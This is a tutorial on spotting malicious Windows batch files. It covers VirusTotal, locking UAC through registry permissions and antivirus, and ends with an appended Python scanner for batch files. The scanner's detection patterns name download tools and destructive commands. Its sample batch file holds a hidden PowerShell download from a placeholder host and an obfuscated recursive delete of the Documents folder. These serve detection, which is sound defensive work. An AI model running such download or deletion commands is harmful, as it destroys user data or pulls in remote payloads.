Previous tutorials covered batch files and suggested that batch files are safe. But are they really? Some malicious people destroy PCs using batch files, because most antivirus products do not scan batch files properly or skip them entirely. But how does a simple batch file destroy a PC? Sometimes a batch file downloads unwanted files from the internet without the user's permission and runs a program in the background (the program is compressed into an archive file so that its code is hidden), and it destroys the PC either so slowly or so quickly that the user can't do anything about it. So let us see how to verify whether a batch file is safe or not.
1. Use VirusTotal
VirusTotal is a website where you can scan your file for free. Just upload the file to the VirusTotal server and wait a little while to view the report. Sometimes the antivirus engines on VirusTotal detect the batch file as a virus and sometimes not, because most antivirus publishers think that a simple batch file can't harm a PC, but that is not true. A batch file can damage a PC just like an exe virus.
2. Enable UAC
What is the connection between batch files and UAC? We know that UAC alerts us when we install a program on the computer. While installing, programs copy their files into system folders (such as System32) and overwrite or delete system files, so UAC alerts you when a system file is about to be changed. If you set UAC to its maximum level, then when a batch file requests administrator permission you can prevent it from changing system files. But it can still modify user-created files in the Desktop or Documents folder (like a ransomware virus). An even safer option is to lock UAC, which means that you also cannot disable UAC.
How to Enable UAC?
Go to 'Control Panel' and search for 'UAC', then click on 'User Account Control', type your administrator password and press the 'Yes' button. Set the switch to 'Always Notify' and hit the OK button. You may need to type your password again.
How to lock UAC?
Open 'Regedit.exe' as Administrator, go to the 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' key, right-click on the 'System' key and choose 'Permission'. Click on 'Advanced' and then click on 'Add'. Type 'everyone' in the box and hit the OK button. Set 'Apply to' to 'This key only' and set the permissions as in the table below.
| Permission | Allow | Deny |
|---|---|---|
| Query Value | Yes | |
| Set Value | | Yes |
| Enumerate Subkey | Yes | |
| Notify | Yes | |
| Delete | | Yes |
| Write DAC | | Yes |
| Write Owner | | Yes |
| Read Control | Yes | |
3. Use Antivirus
Antiviruses are awesome. They detect malicious programs on your PC and protect you with his (or her, if the antivirus was made by a female programmer lol) real-time protection. Antiviruses also sometimes detect batch files. For this feature, you need to use an up-to-date antivirus (like Emsisoft). Most antiviruses detect malicious batch files using a 'Behavior Shield': it checks the behavior of every program, and if a program does something wrong, the antivirus sends it to the virus chest or deletes it permanently.
4. View Codes
View the code of the batch file to determine what it can do. You need to know a little bit about batch files. If you don't know about batch files, you can learn from the batch file tutorials by clicking here.
How to View the code of a batch file?
You don't need any specific software to view the code of a batch file. You can open it in any text editor, but I recommend Notepad++, because it highlights batch file code in different colors and is easy to customize. Just right-click on the batch file and choose 'Edit with Notepad++'. If you don't want to use Notepad++, you can open the file in Windows Notepad: right-click on the batch file and choose 'Edit'. If that fails, open the file from within Notepad using the Open menu or the shortcut key 'Ctrl+O'.
To solve this issue, you can use Batch File Hunter
Batch File Hunter is a program that detects malicious code in a batch file and creates a report to help the user determine whether the batch file is safe or unsafe.
Download:
Currently Unavailable!
Check my profile on GitHub to download Batch File Hunter.
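The manual review described under 'View Codes' can be partly automated. The Python script below is an added example, not part of the original post and not Batch File Hunter's code; its rule names, patterns and sample batch file are constructed for illustration and cover only the behaviours this post mentions.

```python
import re

# Illustrative rules (assumptions, not a complete signature set): each maps a
# behaviour this post mentions to a regex applied to one logical batch line.
RULES = {
    "download": r"\b(bitsadmin|certutil\s+.*-urlcache|curl|wget|Invoke-WebRequest|DownloadFile)\b",
    "hidden-run": r"\bstart\s+.*(/b|/min)\b|-WindowStyle\s+Hidden",
    "unpack-archive": r"\b(Expand-Archive|expand|tar\s+-x\w*|7z(\.exe)?\s+x)\b",
    "system-path": r"%(SystemRoot|windir)%|\\Windows\\System32",
    "destructive": r"\b(del|erase|rd|rmdir|format)\b.*(/s|/q)",
    "elevation": r"\brunas\b|-Verb\s+RunAs",
    "user-files": r"%USERPROFILE%\\(Desktop|Documents)",
}

def logical_lines(text):
    """Yield (first_line_no, command) with ^ continuations joined, ^ escapes
    removed and rem/:: comments skipped, so a split keyword like d^el matches."""
    buf, start = "", None
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        start = no if start is None else start
        if line.endswith("^"):          # caret at end of line: command continues
            buf += line[:-1]
            continue
        cmd = (buf + line).replace("^", "").lstrip("@ ")
        buf, first, start = "", start, None
        if cmd and not re.match(r"(rem\b|::)", cmd, re.I):
            yield first, cmd
    if buf.strip():                     # file ended on a dangling continuation
        yield start, buf.replace("^", "")

def scan(text):
    """Return (line_no, rule, command) for every rule a logical line matches."""
    return [(no, rule, cmd)
            for no, cmd in logical_lines(text)
            for rule, pattern in RULES.items() if re.search(pattern, cmd, re.I)]

# Constructed sample for the demo; example.invalid is a placeholder host.
SAMPLE = r"""@echo off
rem del /s /q is only mentioned in this comment
echo Cleaning temporary files...
powershell -WindowStyle Hidden -Command ^
  "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.zip','%TEMP%\a.zip')"
d^el /q /s "%USERPROFILE%\Documents\*"
"""

if __name__ == "__main__":
    for no, rule, cmd in scan(SAMPLE):
        print(f"line {no}: {rule:15} {cmd}")
```

A finding only marks a line to read closely in the editor; a file with no findings has not been shown to be safe.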